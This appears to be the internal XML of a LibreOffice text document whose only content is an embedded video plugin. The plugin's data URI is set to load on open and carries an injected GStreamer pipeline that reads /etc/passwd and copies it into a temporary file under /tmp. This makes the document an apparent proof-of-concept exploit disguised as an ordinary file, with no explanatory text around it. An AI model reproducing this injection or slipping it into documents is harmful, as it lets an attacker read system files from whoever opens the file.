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tent.xml" manifest:media-type="text/xml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Thumbnails/thumbnail.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="settings.xml" manifest:media-type="text/xml"/>
  <manifest:file-entry manifest:full-path="styles.xml" manifest:media-type="text/xml"/>
  <manifest:file-entry manifest:full-path="Media/guard.mp4" manifest:media-type="application/vnd.sun.star.media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Noto Sans Devanagari1" svg:font-family="'Noto Sans Devanagari'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Noto Sans" svg:font-family="'Noto Sans'" style:font-family-generic="system" style:font-pitch="variable"/>
    <style:font-face style:name="Noto Sans Devanagari" svg:font-family="'Noto Sans Devanagari'" style:font-family-generic="system" style:font-pitch="variable"/>
  </office:font-face-decls>
  <office:automatic-styles>
    <style:style style:name="gr1" style:family="graphic">
      <style:graphic-properties style:run-through="foreground" style:wrap="run-through" style:number-wrapped-paragraphs="no-limit" style:vertical-pos="from-top" style:vertical-rel="paragraph-content" style:horizontal-pos="from-left" style:horizontal-rel="paragraph-content"/>
    </style:style>
  </office:automatic-styles>
  <office:body>
    <office:text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Standard">
        <draw:frame text:anchor-type="paragraph" draw:z-index="0" draw:style-name="gr1" svg:width="12.699cm" svg:height="12.593cm" svg:x="2.439cm" svg:y="6.971cm">
          <draw:plugin xlink:href="data:video/mp4;base64,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#%20!%20fakesink%20filesrc%20location=/etc/passwd%20!%20downloadbuffer%20temp-remove=false%20temp-template=/tmp/XXXXXX" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="application/vnd.sun.star.media">
            <draw:param draw:name="Loop" draw:value="false"/>
            <draw:param draw:name="Mute" draw:value="false"/>
            <draw:param draw:name="VolumeDB" draw:value="0"/>
          </draw:plugin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2024-04-04T18:19:31.377142113</meta:creation-date>
    <dc:date>2024-04-04T18:20:09.524379021</dc:date>
    <meta:editing-duration>PT38S</meta:editing-duration>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="0" meta:word-count="0" meta:character-count="0" meta:non-whitespace-character-count="0"/>
    <meta:generator>LibreOffice/6.3.0.1$Linux_X86_64 LibreOffice_project/41ac97386aba908b6db860cfb4cfe2da871886ae</meta:generator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6562</config:config-item>
      <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item>
      <config:config-item config:name="ViewAreaWidth" config:type="long">44240</config:config-item>
      <config:config-item config:name="ViewAreaHeight" config:type="long">17914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13619</config:config-item>
          <config:config-item config:name="ViewTop" config:type="long">2501</config:config-item>
          <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item>
          <config:config-item config:name="VisibleTop" config:type="long">6562</config:config-item>
          <config:config-item config:name="VisibleRight" config:type="long">44238</config:config-item>
          <config:config-item config:name="VisibleBottom" config:type="long">24474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true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1464632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false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1464632</config:config-item>
      <config:config-item config:name="PrintHiddenText" config:type="boolean">false</config:config-item>
      <config:config-item config:name="ProtectForm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UnbreakableNumberings" config:type="boolean">false</config:config-item>
      <config:config-item config:name="ChartAutoUpdate" config:type="boolean">true</config:config-item>
      <config:config-item config:name="StylesNoDefault" config:type="boolean">false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Noto Sans Devanagari1" svg:font-family="'Noto Sans Devanagari'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Noto Sans" svg:font-family="'Noto Sans'" style:font-family-generic="system" style:font-pitch="variable"/>
    <style:font-face style:name="Noto Sans Devanagari" svg:font-family="'Noto Sans Devanagari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fr" fo:country="FR" style:letter-kerning="true" style:font-name-asian="Noto Sans" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Noto Sans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fr" fo:country="FR" style:letter-kerning="true" style:font-name-asian="Noto Sans" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Noto Sans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" style:font-family-asian="'Noto Sans'" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="14pt" style:font-name-complex="Noto Sans Devanagari" style:font-family-complex="'Noto Sans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Noto Sans Devanagari1" style:font-family-complex="'Noto Sans Devanagari'" style:font-family-generic-complex="swiss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Noto Sans Devanagari1" style:font-family-complex="'Noto Sans Devanagari'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Noto Sans Devanagari1" style:font-family-complex="'Noto Sans Devanagari'" style:font-family-generic-complex="swiss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